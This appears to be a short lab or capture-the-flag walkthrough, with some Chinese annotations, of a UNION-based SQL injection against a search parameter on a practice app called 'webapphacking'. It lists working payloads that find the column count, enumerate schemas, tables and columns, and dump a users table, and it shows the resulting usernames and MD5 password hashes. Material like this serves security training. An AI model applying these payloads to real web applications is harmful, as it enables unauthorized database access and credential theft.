1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
| search=Linux OS' order by 3 # - 正常 search=Linux OS' order by 4 # - 错误
search=-Linux OS' union select 1,2,3 # search=-Linux OS' union select 1,database(),3 # webapphacking search=-Linux OS' union select 1,group_concat(schema_name),3 from information_schema.schemata # information_schema,mysql,performance_schema,sys,webapphacking search=-Linux OS' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'webapphacking' # books,users search=-Linux OS' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = 'webapphacking'and table_name = 'users' # id,user,pasword,name,address search=-Linux OS' union select 1,group_concat(user,'-',pasword,'<hr/>'),3 from users #
user1-5d41402abc4b2a76b9719d911017c592 user2-6269c4f71a55b24bad0f0267d9be5508 user3-0f359740bd1cda994f8b55330c86d845 test-05a671c66aefea124cc08b76ea6d30bb superadmin-2386acb2cf356944177746fc92523983 test1-05a671c66aefea124cc08b76ea6d30bb
|